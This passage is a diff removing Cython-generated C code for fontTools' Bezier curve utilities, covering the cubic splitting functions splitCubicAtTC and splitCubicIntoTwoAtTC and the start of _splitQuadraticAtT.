__Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - for (index=0; index < 4; index++) { - PyObject* item = __pyx_t_7(__pyx_t_6); if (unlikely(!item)) goto __pyx_L4_unpacking_failed; - __Pyx_GOTREF(item); - *(temps[index]) = item; - } - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 4) < 0) __PYX_ERR(0, 657, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L5_unpacking_done; - __pyx_L4_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 657, __pyx_L1_error) - __pyx_L5_unpacking_done:; - } - __pyx_t_8 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_2); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_9 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_3); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_10 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_4); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_11 = __Pyx_PyComplex_As___pyx_t_double_complex(__pyx_t_5); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 657, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_cur_scope->__pyx_v_a = __pyx_t_8; - __pyx_cur_scope->__pyx_v_b = __pyx_t_9; - __pyx_cur_scope->__pyx_v_c = __pyx_t_10; - __pyx_cur_scope->__pyx_v_d = __pyx_t_11; - - /* "fontTools/misc/bezierTools.py":658 - * """ - * a, b, c, d = calcCubicParametersC(pt1, pt2, pt3, pt4) - * yield from _splitCubicAtTC(a, b, c, d, *ts) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_splitCubicAtTC_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_a); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 658, __pyx_L1_error) 
- __Pyx_GOTREF(__pyx_t_5); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_b); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_cur_scope->__pyx_v_d); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_5); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_5)) __PYX_ERR(0, 658, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_4)) __PYX_ERR(0, 658, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_3)) __PYX_ERR(0, 658, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_2)) __PYX_ERR(0, 658, __pyx_L1_error); - __pyx_t_5 = 0; - __pyx_t_4 = 0; - __pyx_t_3 = 0; - __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_6, __pyx_cur_scope->__pyx_v_ts); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_2, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 658, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __Pyx_Generator_Yield_From(__pyx_generator, __pyx_t_6); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_XGOTREF(__pyx_r); - if (likely(__pyx_r)) { - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - /* return from generator, yielding value */ - __pyx_generator->resume_label = 1; - return __pyx_r; - 
__pyx_L6_resume_from_yield_from:; - if (unlikely(!__pyx_sent_value)) __PYX_ERR(0, 658, __pyx_L1_error) - } else { - PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); - if (exc_type) { - if (likely(exc_type == PyExc_StopIteration || (exc_type != PyExc_GeneratorExit && __Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration)))) PyErr_Clear(); - else __PYX_ERR(0, 658, __pyx_L1_error) - } - } - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - - /* function exit code */ - PyErr_SetNone(PyExc_StopIteration); - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("splitCubicAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC, "splitCubicIntoTwoAtTC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, double t)\nSplit a cubic Bezier curve at t.\n\n Args:\n pt1,pt2,pt3,pt4: 
Control points of the Bezier as complex numbers.\n t: Position at which to split the curve.\n\n Returns:\n A tuple of two curve segments (each curve segment being four complex numbers).\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC = {"splitCubicIntoTwoAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - double __pyx_v_t; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicIntoTwoAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = 
__Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 1); __PYX_ERR(0, 661, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 2); __PYX_ERR(0, 661, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 3); __PYX_ERR(0, 661, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } 
- else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 661, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, 4); __PYX_ERR(0, 661, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitCubicIntoTwoAtTC") < 0)) __PYX_ERR(0, 661, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - __pyx_v_t = __pyx_PyFloat_AsDouble(values[4]); if (unlikely((__pyx_v_t == (double)-1) && PyErr_Occurred())) __PYX_ERR(0, 675, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubicIntoTwoAtTC", 1, 5, 5, __pyx_nargs); __PYX_ERR(0, 661, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicIntoTwoAtTC", __pyx_clineno, 
__pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t) { - double __pyx_v_t2; - double __pyx_v__1_t; - double __pyx_v__1_t_2; - double __pyx_v__2_t_1_t; - __pyx_t_double_complex __pyx_v_pointAtT; - __pyx_t_double_complex __pyx_v_off1; - __pyx_t_double_complex __pyx_v_off2; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitCubicIntoTwoAtTC", 1); - - /* "fontTools/misc/bezierTools.py":685 - * A tuple of two curve segments (each curve segment being four complex numbers). 
- * """ - * t2 = t * t # <<<<<<<<<<<<<< - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - */ - __pyx_v_t2 = (__pyx_v_t * __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":686 - * """ - * t2 = t * t - * _1_t = 1 - t # <<<<<<<<<<<<<< - * _1_t_2 = _1_t * _1_t - * _2_t_1_t = 2 * t * _1_t - */ - __pyx_v__1_t = (1.0 - __pyx_v_t); - - /* "fontTools/misc/bezierTools.py":687 - * t2 = t * t - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t # <<<<<<<<<<<<<< - * _2_t_1_t = 2 * t * _1_t - * pointAtT = ( - */ - __pyx_v__1_t_2 = (__pyx_v__1_t * __pyx_v__1_t); - - /* "fontTools/misc/bezierTools.py":688 - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - * _2_t_1_t = 2 * t * _1_t # <<<<<<<<<<<<<< - * pointAtT = ( - * _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - */ - __pyx_v__2_t_1_t = ((2.0 * __pyx_v_t) * __pyx_v__1_t); - - /* "fontTools/misc/bezierTools.py":690 - * _2_t_1_t = 2 * t * _1_t - * pointAtT = ( - * _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 # <<<<<<<<<<<<<< - * ) - * off1 = _1_t_2 * pt1 + _2_t_1_t * pt2 + t2 * pt3 - */ - __pyx_v_pointAtT = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v__1_t), 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(3, 0), __Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t_2 * __pyx_v_t), 0), __pyx_v_pt2), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v__1_t * __pyx_v_t2), 0), __pyx_v_pt3)))), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts((__pyx_v_t2 * __pyx_v_t), 0), __pyx_v_pt4)); - - /* "fontTools/misc/bezierTools.py":692 - * _1_t_2 * _1_t * pt1 + 3 * (_1_t_2 * t * pt2 + _1_t * t2 * pt3) + t2 * t * pt4 - * ) - * off1 = _1_t_2 * pt1 + _2_t_1_t * pt2 + t2 * pt3 # <<<<<<<<<<<<<< - * off2 = _1_t_2 * pt2 + _2_t_1_t * pt3 + t2 * pt4 - * - */ - __pyx_v_off1 = 
__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__1_t_2, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__2_t_1_t, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v_t2, 0), __pyx_v_pt3)); - - /* "fontTools/misc/bezierTools.py":693 - * ) - * off1 = _1_t_2 * pt1 + _2_t_1_t * pt2 + t2 * pt3 - * off2 = _1_t_2 * pt2 + _2_t_1_t * pt3 + t2 * pt4 # <<<<<<<<<<<<<< - * - * pt2 = pt1 + (pt2 - pt1) * t - */ - __pyx_v_off2 = __Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__1_t_2, 0), __pyx_v_pt2), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v__2_t_1_t, 0), __pyx_v_pt3)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(__pyx_v_t2, 0), __pyx_v_pt4)); - - /* "fontTools/misc/bezierTools.py":695 - * off2 = _1_t_2 * pt2 + _2_t_1_t * pt3 + t2 * pt4 - * - * pt2 = pt1 + (pt2 - pt1) * t # <<<<<<<<<<<<<< - * pt3 = pt4 + (pt3 - pt4) * _1_t - * - */ - __pyx_v_pt2 = __Pyx_c_sum_double(__pyx_v_pt1, __Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1), __pyx_t_double_complex_from_parts(__pyx_v_t, 0))); - - /* "fontTools/misc/bezierTools.py":696 - * - * pt2 = pt1 + (pt2 - pt1) * t - * pt3 = pt4 + (pt3 - pt4) * _1_t # <<<<<<<<<<<<<< - * - * return ((pt1, pt2, off1, pointAtT), (pointAtT, off2, pt3, pt4)) - */ - __pyx_v_pt3 = __Pyx_c_sum_double(__pyx_v_pt4, __Pyx_c_prod_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt4), __pyx_t_double_complex_from_parts(__pyx_v__1_t, 0))); - - /* "fontTools/misc/bezierTools.py":698 - * pt3 = pt4 + (pt3 - pt4) * _1_t - * - * return ((pt1, pt2, off1, pointAtT), (pointAtT, off2, pt3, pt4)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_pt1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_pt2); if (unlikely(!__pyx_t_2)) 
__PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_off1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pointAtT); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyTuple_New(4); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_2)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_t_3 = 0; - __pyx_t_4 = 0; - __pyx_t_4 = __pyx_PyComplex_FromComplex(__pyx_v_pointAtT); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = __pyx_PyComplex_FromComplex(__pyx_v_off2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __pyx_PyComplex_FromComplex(__pyx_v_pt3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __pyx_PyComplex_FromComplex(__pyx_v_pt4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyTuple_New(4); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_4)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_3)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if 
(__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 2, __pyx_t_2)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 3, __pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error); - __pyx_t_4 = 0; - __pyx_t_3 = 0; - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 698, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_5); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_5)) __PYX_ERR(0, 698, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_6)) __PYX_ERR(0, 698, __pyx_L1_error); - __pyx_t_5 = 0; - __pyx_t_6 = 0; - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubicIntoTwoAtTC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT, "_splitQuadraticAtT(a, b, c, *ts)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT = {"_splitQuadraticAtT", 
(PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitQuadraticAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 3, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return 